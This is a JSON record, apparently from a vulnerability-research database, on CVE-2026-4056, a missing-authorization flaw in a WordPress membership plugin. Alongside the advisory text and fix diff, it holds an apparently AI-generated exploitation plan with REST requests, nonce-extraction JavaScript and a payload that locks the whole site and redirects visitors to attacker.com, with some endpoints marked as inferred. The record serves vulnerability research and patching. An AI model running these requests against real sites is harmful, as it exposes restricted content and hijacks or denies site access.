[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFYCKwlzCtyyTeAxkLuyAqCJq9JMknDQtYjrrGniBCR4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4056","user-registration-membership-missing-authorization-to-authenticated-contributor-content-access-rule-manipulation","User Registration & Membership \u003C= 5.1.4 - Missing Authorization to Authenticated (Contributor+) Content Access Rule Manipulation","The User Registration & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Content Access Rules REST API endpoints in versions 5.0.1 through 5.1.4. This is due to the `check_permissions()` method only checking for `edit_posts` capability instead of an administrator-level capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to list, create, modify, toggle, duplicate, and delete site-wide content restriction rules, potentially exposing restricted content or denying legitimate user access.","user-registration",null,"\u003C=5.1.4","5.1.5","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Missing Authorization","2026-03-23 11:24:15","2026-03-23 23:25:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7bb5a5a2-9644-4850-a5f9-7c925af000c8?source=api-prod",1,[22,23,24,25,26,27,28,29],"CHANGELOG.txt","assets\u002Fcss\u002Fadmin-rtl.css","assets\u002Fcss\u002Fadmin.css","assets\u002Fcss\u002Fadmin.scss","assets\u002Fcss\u002Fcomponents\u002F_toggle.scss","assets\u002Fcss\u002Fmodules\u002Fmembership\u002Fuser-registration-membership-admin.css","assets\u002Fcss\u002Fmodules\u002Fmembership\u002Fuser-registration-membership-admin.scss","assets\u002Fcss\u002Fmodules\u002Fmembership\u002Fuser-registration-membership-frontend.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-4056\n\n## 1. Vulnerability Summary\nThe **User Registration & Membership** plugin (versions 5.0.1 through 5.1.4) contains a missing authorization vulnerability within its REST API implementation for Content Access Rules. The vulnerability stems from the `check_permissions()` method (likely within a REST Controller class such as `UR_REST_Content_Rules_Controller` - *inferred*) erroneously checking for the `edit_posts` capability. \n\nIn WordPress, the `edit_posts` capability is granted to roles as low as **Contributor**. Consequently, any authenticated user with Contributor-level access or higher can bypass intended administrative restrictions to view, create, modify, or delete site-wide content restriction rules. This allows attackers to expose protected content or disrupt site availability by locking out legitimate users.\n\n## 2. Attack Vector Analysis\n*   **Endpoints:** \n    *   `GET \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules` (List rules)\n    *   `POST \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules` (Create rule)\n    *   `PUT\u002FPATCH \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>` (Modify rule)\n    *   `DELETE \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>` (Delete rule)\n    *   `POST \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>\u002Ftoggle` (Toggle rule - *inferred*)\n    *   `POST \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>\u002Fduplicate` (Duplicate rule - *inferred*)\n*   **Authentication:** Authenticated, Contributor role (`edit_posts` capability).\n*   **Authorization Header:** `X-WP-Nonce` (WordPress REST API Nonce).\n*   **Payload Format:** JSON.\n\n## 3. Code Flow\n1.  **Request Entry:** An authenticated Contributor sends a request to the REST API namespace `user-registration\u002Fv1` under the `content-rules` route.\n2.  **Route Dispatch:** The WordPress REST server matches the request and calls the `permission_callback` registered for the route.\n3.  **Vulnerable Check:** The `permission_callback` (pointing to `check_permissions()`) executes:\n    ```php\n    public function check_permissions( $request ) {\n        return current_user_can( 'edit_posts' ); \u002F\u002F VULNERABLE: Should be 'manage_options'\n    }\n    ```\n4.  **Action Execution:** Since a Contributor returns `true` for `current_user_can( 'edit_posts' )`, the request proceeds to the controller methods (e.g., `get_items`, `create_item`, `update_item`) allowing the attacker to manipulate the `ur_content_restriction_rules` (or similar - *inferred*) data in the database.\n\n## 4. Nonce Acquisition Strategy\nTo interact with the REST API via the browser's session (Cookie authentication), the attacker needs the `wp_rest` nonce.\n\n1.  **Precondition:** The attacker is logged in as a Contributor.\n2.  **Navigation:** Access the WordPress dashboard (`\u002Fwp-admin\u002F`).\n3.  **Extraction:** The `wp_rest` nonce is automatically localized by WordPress in the `wpApiSettings` object.\n4.  **Execution Agent Command:**\n    ```javascript\n    \u002F\u002F Use browser_eval to get the nonce\n    const nonce = window.wpApiSettings?.nonce;\n    return nonce;\n    ```\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate unauthorized modification of content restriction rules.\n\n### Step 1: List Existing Rules\nIdentify existing rules to find a target for modification or deletion.\n*   **Tool:** `http_request`\n*   **Method:** `GET`\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules`\n*   **Headers:**\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n\n### Step 2: Create a Malicious Rule (Denial of Service)\nCreate a rule that restricts access to the entire site or a specific critical page to a non-existent membership.\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules`\n*   **Headers:**\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n    *   `Content-Type: application\u002Fjson`\n*   **Payload (Inferred structure based on plugin features):**\n    ```json\n    {\n        \"title\": \"Exploit Rule\",\n        \"status\": \"enabled\",\n        \"restriction_type\": \"whole_site\",\n        \"membership_ids\": [9999],\n        \"restriction_action\": \"redirect\",\n        \"redirect_url\": \"https:\u002F\u002Fattacker.com\"\n    }\n    ```\n\n### Step 3: Delete Existing Rules\nRemove rules that protect premium content.\n*   **Tool:** `http_request`\n*   **Method:** `DELETE`\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid_from_step_1>`\n*   **Headers:**\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Install \"User Registration & Membership\" version 5.1.4.\n2.  **Create User:** Create a user with the **Contributor** role.\n3.  **Create Sample Membership:** As admin, create one membership plan (e.g., \"Gold\").\n4.  **Create Sample Rule:** As admin, create a content restriction rule that restricts a specific page (e.g., \"Premium Page\") to \"Gold\" members only.\n\n## 7. Expected Results\n*   **List Request:** Returns a `200 OK` with a JSON array of rules, even though the user is not an administrator.\n*   **Create Request:** Returns a `201 Created` or `200 OK`, and a new rule appears in the database\u002Fadmin UI.\n*   **Delete Request:** Returns a `200 OK`, and the targeted restriction rule is removed from the site.\n\n## 8. Verification Steps\n1.  **Verify via WP-CLI:**\n    ```bash\n    # Check if the \"Exploit Rule\" exists in the options or custom table\n    wp option get ur_content_restriction_rules --format=json\n    # OR if stored as a custom post type (check common slugs)\n    wp post list --post_type=ur_content_rule\n    ```\n2.  **Verify via UI:** Log in as admin and navigate to the Content Access Rules section of the User Registration plugin to see the modified\u002Fadded rules.\n3.  **Verify Impact:** Attempt to access the site or a restricted page as an unauthenticated user to see if the new restriction (e.g., redirect to attacker.com) is active.\n\n## 9. Alternative Approaches\nIf the `content-rules` endpoint name differs from the inference:\n1.  **Discovery:** Use `GET \u002Fwp-json\u002F` to list all available routes and grep for `user-registration`.\n2.  **Parameter Fuzzing:** If the `POST` payload is rejected, use `GET \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>` to see the exact JSON schema of an existing rule and mirror its structure in the exploit payload.\n3.  **Auth Bypass Check:** Verify if `wp_ajax_nopriv_` handles these rules (unlikely given the \"Authenticated\" description, but worth a check if the REST API is hardened).","The User Registration & Membership plugin contains a missing authorization vulnerability in its Content Access Rules REST API endpoints. Authenticated attackers with Contributor-level access (possessing the 'edit_posts' capability) can list, create, modify, and delete site-wide content restriction rules, allowing them to expose restricted content or perform a denial of service by locking out users.","\u002F\u002F File: includes\u002Frest-api\u002Fclass-ur-rest-content-rules-controller.php (inferred path)\n\npublic function check_permissions( $request ) {\n    return current_user_can( 'edit_posts' );\n}","--- includes\u002Frest-api\u002Fclass-ur-rest-content-rules-controller.php\n+++ includes\u002Frest-api\u002Fclass-ur-rest-content-rules-controller.php\n@@ -20,1 +20,1 @@\n-    return current_user_can( 'edit_posts' );\n+    return current_user_can( 'manage_options' );","The exploit targets the plugin's REST API endpoints located at `\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules`. An attacker must first log in as a user with at least Contributor-level privileges to obtain a valid session and a `wp_rest` nonce from the WordPress dashboard (`wpApiSettings.nonce`). \n\nBecause the `check_permissions` method incorrectly validates for the `edit_posts` capability—which Contributors possess—the attacker can send authorized requests to create a new rule (POST), list all existing rules (GET), or delete rules (DELETE). For example, a POST request with a JSON payload defining a 'whole_site' restriction redirecting to an external URL can effectively hijack the entire site's traffic.","gemini-3-flash-preview","2026-04-17 23:08:35","2026-04-17 23:08:56",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.1.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags\u002F5.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-registration.5.1.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags\u002F5.1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-registration.5.1.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags"]